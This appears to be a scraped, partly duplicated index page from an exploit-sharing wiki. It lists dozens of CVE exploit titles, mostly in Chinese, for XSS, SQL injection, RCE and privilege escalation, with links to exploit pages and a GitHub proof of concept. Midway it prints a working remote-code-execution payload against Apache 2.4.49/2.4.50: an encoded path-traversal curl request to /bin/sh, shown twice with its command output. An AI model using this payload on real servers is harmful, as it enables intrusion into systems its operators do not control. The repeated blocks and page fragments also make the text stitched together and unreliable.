CVE-2019-10677 DASAN Zhone ZNID GPON 2426A EU Multiple XSS漏洞
CVE-2019-1619&CVE-2019-1622 Cisco Data Center Network Manager 遠程代碼執行漏洞
CVE-2019-15081 Opencart 3.x XSS漏洞
CVE-2019-15814 Sentrifugo 3.2 XSS漏洞
CVE-2011-2921 ktsuss 1.4 suid 權限提升漏洞
CVE-2019-16197 Dolibarr ERP-CRM 10.0.1 XSS漏洞
CVE-2019-16119 WordPress Plugin Photo Gallery 1.5.34 SQL注入漏洞
CVE-2019-16068 Enigma NMS 65.0.0 CSRF漏洞
CVE-2019-16065 Enigma NMS 65.0.0 SQL注入漏洞
CVE-2015-5287 ABRT sosreport 本地權限提升漏洞
CVE-2019-16701 pfSense 2.3.4&2.4.4-p3 遠程代碼注入漏洞
CVE-2019-16679 Gila CMS 本地文件包含漏洞
CVE-2019-17080 mintinstall 7.9.9 代碼執行漏洞
CVE-2019-12562 DotNetNuke XSS漏洞
CVE-2015-5287 ABRT sosreport 權限提升漏洞
CVE-2019-5485 NPMJS gitlabhook 0.0.17 遠程代碼執行漏洞
CVE-2019-17132 vBulletin 5.5.4 遠程代碼執行漏洞
CVE-2019-17271 vBulletin 5.5.4 SQL注入漏洞
CVE-2019-17225 Subrion 4.2.1 XSS漏洞
CVE-2019-15741 GitLab Omnibus 12.2.1 Logrotate 權限提升漏洞
Garuda Media SQL注入漏洞
BelajarBro SQL注入漏洞
CVE-2019-13529 SMA Solar Technology AG Sunny WebBox 1.6 CSRF漏洞
CVE-2019-6971 TP-Link TL-WR1043ND 2 身份驗證繞過漏洞
CVE-2019-1619&CVE-2019-1622 Cisco Data Center Network Manager 遠程代碼執行漏洞
CVE-2019-15081 Opencart 3.x XSS漏洞
CVE-2019-15814 Sentrifugo 3.2 XSS漏洞
CVE-2011-2921 ktsuss 1.4 suid 權限提升漏洞
CVE-2019-16197 Dolibarr ERP-CRM 10.0.1 XSS漏洞
CVE-2019-16119 WordPress Plugin Photo Gallery 1.5.34 SQL注入漏洞
CVE-2019-16068 Enigma NMS 65.0.0 CSRF漏洞
CVE-2019-16065 Enigma NMS 65.0.0 SQL注入漏洞
CVE-2015-5287 ABRT sosreport 本地權限提升漏洞
CVE-2019-16701 pfSense 2.3.4&2.4.4-p3 遠程代碼注入漏洞
CVE-2019-16679 Gila CMS 本地文件包含漏洞
CVE-2019-17080 mintinstall 7.9.9 代碼執行漏洞
CVE-2019-12562 DotNetNuke XSS漏洞
CVE-2015-5287 ABRT sosreport 權限提升漏洞
CVE-2019-5485 NPMJS gitlabhook 0.0.17 遠程代碼執行漏洞
CVE-2019-17132 vBulletin 5.5.4 遠程代碼執行漏洞
CVE-2019-17271 vBulletin 5.5.4 SQL注入漏洞
CVE-2019-17225 Subrion 4.2.1 XSS漏洞
CVE-2019-15741 GitLab Omnibus 12.2.1 Logrotate 權限提升漏洞
Garuda Media SQL注入漏洞
BelajarBro SQL注入漏洞
CVE-2019-13529 SMA Solar Technology AG Sunny WebBox 1.6 CSRF漏洞
CVE-2019-6971 TP-Link TL-WR1043ND 2 身份驗證繞過漏洞
CVE-2021-40539 ZOHO ManageEngine ADSelfService Plus 遠程代碼執行漏洞
https://short.pwnwiki.org/?c=twKB3M
https://short.pwnwiki.org/?c=twKB3M
PHP 7.0-8.0 disable_functions bypass 0day
https://www.pwnwiki.org/index.php?title=PHP_7.0-8.0_disable_functions_bypass_0day
https://www.pwnwiki.org/index.php?title=PHP_7.0-8.0_disable_functions_bypass_0day
PwnWiki
Special:Badtitle
RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013):
root@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
root@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
CVE-2021-37980 Chrome Inappropriate implementation in Sandbox(Windows Only) POC
https://github.com/ZeusBox/CVE-2021-37980
https://github.com/ZeusBox/CVE-2021-37980
GitHub
GitHub - ZeusBox/CVE-2021-37980: PoC CVE-2021-37980 : Inappropriate implementation in Sandbox (windows only)
PoC CVE-2021-37980 : Inappropriate implementation in Sandbox (windows only) - ZeusBox/CVE-2021-37980
CVE-2019-11631 Moodle Admin Shell Upload
https://www.pwnwiki.org/index.php?title=CVE-2019-11631_Moodle_Admin_Shell_Upload
https://www.pwnwiki.org/index.php?title=CVE-2019-11631_Moodle_Admin_Shell_Upload
Cypress Solutions CTM-200/CTM-ONE Hard-Coded Credentials Remote Root
https://www.pwnwiki.org/index.php?title=Cypress_Solutions_CTM-200/CTM-ONE_Hard-Coded_Credentials_Remote_Root
https://www.pwnwiki.org/index.php?title=Cypress_Solutions_CTM-200/CTM-ONE_Hard-Coded_Credentials_Remote_Root
CVE-2021-21809 Moodle SpellChecker Path Authenticated Remote Command Execution
https://www.pwnwiki.org/index.php?title=CVE-2021-21809_Moodle_SpellChecker_Path_Authenticated_Remote_Command_Execution
https://www.pwnwiki.org/index.php?title=CVE-2021-21809_Moodle_SpellChecker_Path_Authenticated_Remote_Command_Execution
CVE-2020-14321 Moodle Teacher Enrollment Privilege Escalation / Remote Code Execution
https://www.pwnwiki.org/index.php?title=CVE-2020-14321_Moodle_Teacher_Enrollment_Privilege_Escalation_/_Remote_Code_Execution
https://www.pwnwiki.org/index.php?title=CVE-2020-14321_Moodle_Teacher_Enrollment_Privilege_Escalation_/_Remote_Code_Execution